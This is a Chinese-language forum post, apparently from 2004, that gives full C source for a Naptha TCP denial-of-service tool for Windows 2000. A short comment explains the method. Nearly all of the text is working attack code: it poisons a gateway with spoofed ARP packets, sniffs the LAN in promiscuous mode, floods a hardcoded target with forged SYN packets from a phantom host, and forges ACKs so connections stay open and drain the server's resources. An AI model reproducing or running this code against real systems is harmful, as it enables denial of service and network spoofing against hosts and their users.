NAPTHA攻击方式在2K下的简单实现
/*
作者:LionD8
EMAIL:[email protected]
出处:https://www.xfocus.net/bbs/index.php?act=SE&f=3&t=33339&p=117598
我的窝:http://liond8.126.com
2004.2.16
凌晨
简单原理:
1.欺骗网关,让网关知道幻影主机的MAC.
2.嗅探局域网中的所有数据包,判断是不是返回给虚幻主机的
第2次握手的数据包。如果是,就伪造第3次握手.
3.发送伪造的SYN报文.
通过消耗对方的维护连接的资源进行DOS。占用通道等。
详细原理请见Warning3老大整理的
《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
我就不废话了。
地址: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721
*/
///////////////////////////////////////////////////
//以下代码在2K
VC6.0下编译通过
//在虚拟机上测试,好像2k系统如《新型网络DoS(拒绝服务)攻击漏洞 -
"Naptha"》
//所说,不受什么影响.
///////////////////////////////////////////////////
#include
"stdio.h"
#include "Packet32.h"
#include "windows.h"
#include
<ws2tcpip.h>
#include "winsock2.h"
#include
"wchar.h"
#define EPT_IP 0x0800
#define EPT_ARP 0x0806
#define ARP_HARDWARE 0x0001
#define ARP_REQUEST 0x0001
#define ARP_REPLY 0x0002
#define
NDIS_PACKET_TYPE_PROMISCUOUS 0x0020 //混杂模式
#pragma comment(lib,
"packet.lib")
#pragma comment(lib, "ws2_32.lib")
#pragma pack(push,
1)
typedef struct ehhdr
{
UCHAR eh_dst[6];
UCHAR eh_src[6];
USHORT eh_type;
}EHHEADR,
*PEHHEADR;
typedef struct arphdr
{
USHORT arp_hrd;
USHORT arp_pro;
UCHAR arp_hln;
UCHAR arp_pln;
USHORT arp_op;
UCHAR arp_sha[6];
ULONG arp_spa;
UCHAR
arp_tha[6];
ULONG arp_tpa;
}ARPHEADR,
*PARPHEADR;
typedef struct
arpPacket
{
EHHEADR ehhdr;
ARPHEADR arphdr;
}
ARPPACKET, *PARPPACKET;
#pragma pack(pop)
typedef struct
ip_head
{
unsigned char h_verlen;
unsigned char
tos;
unsigned short total_len;
unsigned short
ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int
sourceIP;
unsigned int destIP;
}IPHEADER;
typedef
struct tcp_head
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned
char th_lenres;
unsigned char th_flag;
USHORT
th_win;
USHORT th_sum;
USHORT th_urp;
}TCPHEADER;
typedef struct tsd_hdr
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short
tcpl;
}PSDHEADER;
DWORD WINAPI ThreadArpSnoop(LPVOID
lp);
USHORT checksum(USHORT *buffer, int
size);
DWORD WINAPI ThreadSynFlood(LPVOID
lp);
DWORD WINAPI SnifferSynAck(LPVOID lp);
void SendAck (
DWORD SEQ , DWORD ACK
,USHORT SPort);
void AnalyseData (LPPACKET
lpPacket);
#define ATPORT 80 //攻击端口
#define ATIP "192.168.1.1" //攻击IP
#define GATE "192.168.85.1" //网关
#define SNOOPIP "192.168.85.250" //幻影主机IP
#define SLEEPTIME 1000
UCHAR DMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};
//广播
UCHAR SMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFE};
//幻影主机MAC
BOOL IsGoOn = TRUE;
void main()
{
IsGoOn
=
FALSE;
CreateThread(NULL,NULL,ThreadArpSnoop,NULL,NULL,NULL);
while
( !IsGoOn )
Sleep(1);
IsGoOn =
FALSE;
CreateThread(NULL,NULL,SnifferSynAck,NULL,NULL,NULL);
while
( !IsGoOn
)
Sleep(1);
CreateThread(NULL,NULL,ThreadSynFlood,NULL,NULL,NULL);
while
(1)
Sleep(1000000);
}
DWORD WINAPI ThreadArpSnoop(LPVOID
lp)
{
static CHAR AdapterList[10][1024];
TCHAR
szPacketBuf[512];
LPADAPTER lpAdapter;
LPPACKET
lpPacket;
WCHAR AdapterName[2048];
WCHAR *temp,*temp1;
ARPPACKET ARPPacket;
ULONG
AdapterLength = 1024;
DWORD AdapterNum = 0;
DWORD
nRetCode, i;
if(PacketGetAdapterNames((char*)AdapterName,
&AdapterLength) == FALSE)
{
printf("Unable to retrieve the
list of the adapters!\n");
return 0;
}
temp =
AdapterName;
temp1=AdapterName;
i = 0;
while ((*temp !=
'\0')||(*(temp-1) != '\0'))
{
if (*temp ==
'\0')
{
memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum
= i;
for (i = 0; i < AdapterNum; i++)
wprintf(L"\n%d- %s\n",
i+1, AdapterList[i]);
printf("\nPlease select adapter
number:");
scanf("%d",&i);
if(i>AdapterNum)
{
printf("\nInput
Number error!");
return 0;
}
IsGoOn =
TRUE;
lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR)
AdapterList[i-1]);
if (!lpAdapter || (lpAdapter->hFile ==
INVALID_HANDLE_VALUE))
{
nRetCode =
GetLastError();
printf("Unable to open the driver, Error Code :
%lx\n", nRetCode);
return 0;
}
lpPacket =
PacketAllocatePacket();
if(lpPacket ==
NULL)
{
printf("\nError:failed to allocate the LPPACKET
structure.");
return 0;
}
memset(szPacketBuf, 0,
sizeof(szPacketBuf));
memcpy(ARPPacket.ehhdr.eh_dst, DMacAddr,
6);
memcpy(ARPPacket.ehhdr.eh_src, SMacAddr, 6);
ARPPacket.ehhdr.eh_type =
htons(EPT_ARP);
ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
ARPPacket.arphdr.arp_pro =
htons(EPT_IP);
ARPPacket.arphdr.arp_hln =
6;
ARPPacket.arphdr.arp_pln =
4;
ARPPacket.arphdr.arp_op =
htons(1);
memcpy(ARPPacket.arphdr.arp_sha, SMacAddr,
6);
ARPPacket.arphdr.arp_spa =
inet_addr(SNOOPIP);
memset(ARPPacket.arphdr.arp_tha,0,6);
ARPPacket.arphdr.arp_tpa
= inet_addr(GATE);
memcpy(szPacketBuf, (char*)&ARPPacket,
sizeof(ARPPacket));
PacketInitPacket(lpPacket, szPacketBuf,
60);
if(PacketSetNumWrites(lpAdapter,
1)==FALSE)
{
printf("warning: Unable to send more than one
packet in a single write!\n");
}
while ( 1
)
{
if(PacketSendPacket(lpAdapter, lpPacket,
TRUE)==FALSE)
{
printf("Error sending the
packets!\n");
return
0;
}
Sleep(30000);
}
PacketFreePacket(lpPacket);
PacketCloseAdapter(lpAdapter);
return
0;
}
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
WSADATA
WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER
ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int
SourcePort;
char szSendBuf[60]={0};
BOOL flag;
int
rect,nTimeOver;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return
0;
}
sock=NULL;
if
((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket
Setup Error!\n");
return 0;
}
flag=true;
if
(setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char
*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return false;
}
nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET,
SO_SNDTIMEO, (char*)&nTimeOver,
sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间
{
printf("setsockopt SO_SNDTIMEO error!\n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4
| sizeof(ipHeader)/sizeof(unsigned
long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));
//IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=htonl(0x12345678);
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
ipHeader.sourceIP=inet_addr(SNOOPIP);
while(TRUE)
{
SourcePort=GetTickCount()%65534;
tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf,
&psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader,
sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT
*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader,
sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader,
sizeof(tcpHeader));
rect=sendto(sock, szSendBuf,
sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in,
sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send
error!:%x\n",WSAGetLastError());
return
false;
}
else printf("send
ok!\n");
Sleep(SLEEPTIME);
}//endwhile
closesocket(sock);
WSACleanup();
return
0;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned
long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum +=
(cksum >>16);
return
(USHORT)(~cksum);
}
DWORD WINAPI SnifferSynAck(LPVOID
lp)
{
LPADAPTER lpAdapter;
static CHAR
AdapterList[10][1024];
ULONG AdapterNum;
WCHAR
AdapterName[2048];
WCHAR
*temp,*temp1;
ULONG AdapterLength=1024;
ULONG i,adapter_num=0;
if(PacketGetAdapterNames((char*)AdapterName,
&AdapterLength) == FALSE)
{
printf("Unable to retrieve the
list of the adapters!\n");
return 0;
}
temp =
AdapterName;
temp1=AdapterName;
i = 0;
while ((*temp !=
'\0')||(*(temp-1) != '\0'))
{
if (*temp ==
'\0')
{
memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum
= i;
for (i = 0; i < AdapterNum; i++)
wprintf(L"\n%d- %s\n",
i+1, AdapterList[i]);
printf("\nPlease select adapter
number:");
scanf("%d",&i);
if(i>AdapterNum)
{
printf("\nInput
Number error!");
return 0;
}
IsGoOn =
TRUE;
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);
if
(!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("Unable
to open the driver, Error Code : %lx\n", GetLastError());
return
0;
}
//设置网卡为混杂模式
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning:
Unable to set the adapter to promiscuous
mode\n");
}
if(PacketSetBuff(lpAdapter,1024*10)==FALSE)
{
printf("PacketSetBuff
Error: %d\n",GetLastError());
return -1;
}
while (
1 )
{
TCHAR Buffer[1024*10]={0};
LPPACKET
lpPacket;
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,Buffer,sizeof(Buffer));
PacketReceivePacket(lpAdapter,lpPacket,TRUE);
AnalyseData(
lpPacket );
PacketFreePacket(lpPacket);
}
return
0;
}
void AnalyseData (LPPACKET lpPacket)
{
char
*Buf;
EHHEADR *lpEthdr;
bpf_hdr *lpBpfhdr;
Buf=(char
*)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)Buf;
lpEthdr=(EHHEADR
*)(Buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800)
&& (!memcmp(lpEthdr->eh_dst,SMacAddr,6))
)
{
TCPHEADER *lpTcphdr;
lpTcphdr=(TCPHEADER
*)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));
if
( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag ==
0x12)
{
SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);
}
}
}
void SendAck
( DWORD SEQ , DWORD ACK ,USHORT SPort)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER
tcpHeader;
PSDHEADER psdHeader;
char
szSendBuf[60]={0};
BOOL flag;
int
rect,nTimeOver;
sock=NULL;
if
((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket
Setup Error!\n");
return ;
}
flag=true;
if
(setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char
*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return ;
}
nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET,
SO_SNDTIMEO, (char*)&nTimeOver,
sizeof(nTimeOver))==SOCKET_ERROR) //设置发送的时间
{
printf("setsockopt SO_SNDTIMEO error!\n");
return ;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4
| sizeof(ipHeader)/sizeof(unsigned
long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));
//IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=htonl((ntohl(SEQ)+1));
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=0x10;
// ack
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=ACK;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
ipHeader.sourceIP=inet_addr(SNOOPIP);
tcpHeader.th_sport=SPort;
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf,
&psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader),
&tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT
*)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf,
&ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader),
&tcpHeader, sizeof(tcpHeader));
rect=sendto(sock, szSendBuf,
sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in,
sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return
;
}
else printf("send
ok!\n");
closesocket(sock);
}
//参考文献: 《新型网络DoS(拒绝服务)攻击漏洞 -
"Naptha"》
http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721
本文地址:http://com.8s8s.com/it/it23047.htm